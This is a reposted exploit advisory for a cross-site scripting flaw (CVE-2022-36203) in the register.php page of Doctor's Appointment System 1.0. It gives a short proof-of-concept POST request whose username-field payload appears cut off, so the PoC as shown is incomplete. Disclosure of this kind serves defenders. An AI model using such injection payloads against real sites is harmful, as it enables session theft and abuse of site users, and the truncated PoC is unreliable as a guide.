Exploit/Advisories no image

Published on September 1st, 2022 📆 | 4388 Views ⚑

0

Doctor’s Appointment System 1.0 Cross Site Scripting – Torchsec


https://www.ispeech.org

Doctor's Appointment System 1.0 Cross Site Scripting
Posted Sep 1, 2022
Authored by Abdullah AlAmri

Doctor's Appointment System version 1.0 suffers from a cross site scripting vulnerability in register.php. Original discovery of cross site scripting in this version is attributed to Soham Bakore in February of 2021.

tags | exploit, php, xss
advisories | CVE-2022-36203
SHA-256 | a044d93c49b403d6f81a3f003fc06d37bc230c31adb301f2bd75449461272144
# Exploit Title: Doctor's Appointment System v1.0 - Cross-Site Scripting (XSS)
# Google Dork: N/A
# Date: 7/13/2022
# Exploit Author: Abdullah Zaid - @_aznull
# Vendor Homepage:
https://www.sourcecodester.com/hashenudara/simple-doctors-appointment-project.html
# Software Link:
https://www.sourcecodester.com/sites/default/files/download/hshnudr/edoc-doctor-appointment-system-main_1.zip
# Version: 1.0
# Tested on: Linux
# CVE : CVE-2022-36203

POC:

POST /register.php HTTP/1.1
Host: localhost





username=a">&password=123

Source link

Tagged with:



Comments are closed.